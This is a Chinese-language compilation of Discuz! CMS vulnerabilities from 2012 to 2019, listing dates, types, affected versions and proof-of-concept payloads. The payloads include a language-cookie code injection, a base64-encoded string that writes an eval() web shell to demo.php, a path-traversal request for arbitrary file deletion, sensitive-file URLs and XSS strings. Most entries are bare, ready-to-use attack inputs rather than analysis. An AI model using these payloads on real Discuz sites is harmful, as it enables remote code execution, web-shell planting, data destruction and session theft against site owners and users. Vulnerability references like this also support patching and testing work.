应用安全 - CMS - Discuz漏洞汇总
Discuz ML! V3.X 代码注入
Date 2019 类型 代码注入导致RCE 影响范围 Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org
poc
_language=sc'.phpinfo().';
SSV-90861
Date:
2012
类型:
敏感信息泄露
影响范围:
DZ x2.5
POC:
http://www.xx.xx/uc_server/control/admin/db.php http://www.xx.xx/source/plugin/myrepeats/table/table_myrepeats.php http://www.xx.xx/install/include/install_lang.php
Discuz! X2.5 远程代码执行
Date: 2012 类型: RCE 前置条件: (1).注册任意账户 (2).登陆用户,发表blog日志(注意是日志) (3).添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} (4).访问日志,论坛根目录下生成demo.php,一句发密码c 影响范围: v2.5
Discuz!X2/2.5弱口令破解漏洞
Date: 2013 类型: 登录界面暴力破解 影响范围: Discuz!X2/2.5
ssvid-93588
Date: 2014 类型: 任意文件删除
前置条件:
(1)登陆DZ前台
(2)请求:
home.php?mod=spacecp&ac=profile&op=base
POST birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b
修改成功之后出生地就会变为../../../test.txt
(3)构造请求向home.php?mod=spacecp&ac=profile&op=base上传文件(普通图片即可)
请求后文件被删除
影响范围: version<=3.4
SSV-96608
Date: 2014.10 类型: 前台任意文件删除 影响范围:
SSV-89024
Date: 2015.1 类型: Discuz X2.5 /source/class/class_image.php 命令执行漏洞 影响范围: Discuz X2.5
Discuz! X系列远程代码执行漏洞
Date: 2015.8 类型: RCE + XML反序列化 前置条件:
访问:/api/uc.php
影响范围:
SSV-91183
Date: 2016.3 类型: SSRF 影响范围: Discuz! X2 X3
POC:
http://www.internetblog.cn/archives/6068.html?mip
CVE-2018-14729
Date: 2018.8 类型: 远程代码执行 前置条件: 登录后台 影响范围: Discuz! 1.5-2.5
Discuz Discuz!X ≤3.4 任意文件删除漏洞分析 Discuz!7.2/X1 第三方插件SQL注入及持久型XSS漏洞 SQL注入及跨站脚本漏洞。 moodwall.inc.php 发表心情处直接插入html代码 code 区域 "><script>alert(/xss/)</script> Discuz! X1某页面存在XSS漏洞 简要描述: 页面对取到的参数没有过滤,直接echo到了html里 详细说明: api/db/dbbak.php页面,对$apptype缺少必要的过滤,调用api_msg()函数时直接将$apptype echo到了html中。 漏洞证明: http://**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22